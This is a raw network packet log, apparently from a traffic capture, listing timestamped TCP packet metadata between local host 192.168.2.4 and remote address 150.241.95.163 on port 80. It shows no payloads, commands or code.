                                                                                                                                                                Nov 15, 2024 10:28:31.867355108 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867366076 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867424965 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867436886 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867449045 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867460966 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867461920 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867463112 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867542982 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867563009 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867573977 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867588997 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867599964 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867609978 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867619991 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867631912 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867631912 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867631912 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867643118 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867652893 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867693901 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867693901 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867693901 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867717028 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867727995 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867738008 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867748976 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867760897 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867772102 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867780924 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867780924 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867783070 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867798090 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867830992 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867832899 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867851019 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867912054 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867912054 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.868211985 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.868302107 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.868313074 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.868349075 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.868360996 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.868372917 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.868383884 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.868416071 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.868416071 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.868416071 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.868484020 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.868494987 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.868505955 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.868521929 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.868534088 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.868567944 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.868570089 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.868570089 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.871326923 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.888300896 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.888315916 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.888329029 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.888339996 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.888350964 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.888520956 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.888520956 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.932604074 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.932725906 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.932743073 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.932754040 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.932816982 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.932826996 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.932857990 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.932952881 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.932952881 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.932952881 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.932982922 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.933101892 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.943198919 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.943229914 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.943242073 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.943336964 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.943388939 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.943399906 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.943411112 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.943422079 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.943531990 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.943531990 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.977262020 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.977279902 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.977291107 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.977346897 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.977368116 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.977380037 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.977391005 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.977400064 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.977411032 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.977421999 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.977456093 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.977456093 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.977456093 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.977957964 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.977977991 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.977988958 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978085041 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978096962 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.978112936 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978125095 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978132010 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978137016 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978202105 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978210926 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.978210926 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.978212118 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978223085 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978235960 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978245020 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978298903 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978310108 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978318930 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978329897 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978338003 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.978338003 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.978338003 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.978346109 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978389978 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.978389978 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.978394985 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978406906 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.978451967 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.989281893 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989295959 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989315033 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989326000 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989336014 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989347935 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989361048 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989367008 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.989367008 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.989377022 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989387989 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989455938 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.989455938 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.989461899 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989473104 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989485025 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989496946 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989506960 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989509106 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.989517927 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989537954 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.989902973 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.989947081 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.989947081 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990015984 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990164995 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990184069 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990195036 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990200996 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990206003 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990216970 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990227938 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990227938 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990238905 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990256071 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990267992 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990278006 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990288973 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990300894 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990313053 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990315914 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990315914 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990315914 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990400076 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990411997 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990422010 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990432978 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990444899 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990446091 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990446091 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990446091 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990454912 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990489006 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990499020 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990529060 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990529060 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990529060 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990608931 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990619898 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990638018 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990649939 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990660906 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990670919 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990680933 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990680933 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990704060 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990715981 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990726948 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990731955 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990770102 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990788937 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990885973 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990896940 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990909100 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990920067 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990930080 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990941048 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990947962 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.990953922 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.990993977 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991004944 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991014957 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991024017 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991033077 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.991033077 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.991033077 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.991036892 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991066933 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.991086960 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991091013 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.991099119 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991110086 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991122007 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991132975 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991136074 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.991189957 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.991195917 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991209030 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991257906 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991267920 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991280079 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991291046 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991333008 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.991349936 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991359949 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.991368055 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.991492987 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.991492987 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.992779016 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.992877960 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.992889881 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.992901087 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.992911100 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.992918968 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.992969990 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.992969990 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.011353970 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.011374950 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.011399031 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.011409044 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.011420965 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.011430025 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.011449099 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.011449099 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.011466980 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.055824041 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.055840969 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.055852890 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.056046009 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.056159973 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.056159973 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.056276083 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.056296110 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.056417942 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.056418896 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.066512108 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.066534996 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.066548109 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.066560030 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.066569090 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.066595078 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.067109108 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.067131996 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.067142963 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.067352057 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.067352057 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.100441933 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.100459099 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.100471973 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.100598097 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.100616932 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.100630045 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.100640059 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.100647926 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.100651026 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.100647926 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.100663900 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.100676060 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.100688934 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.100711107 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.100711107 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.100711107 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.101212025 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101290941 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101303101 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101315022 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101365089 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101418018 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.101418018 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.101418018 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:32.101440907 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:32.101468086 CET8049736150.241.95.163192.168.2.4
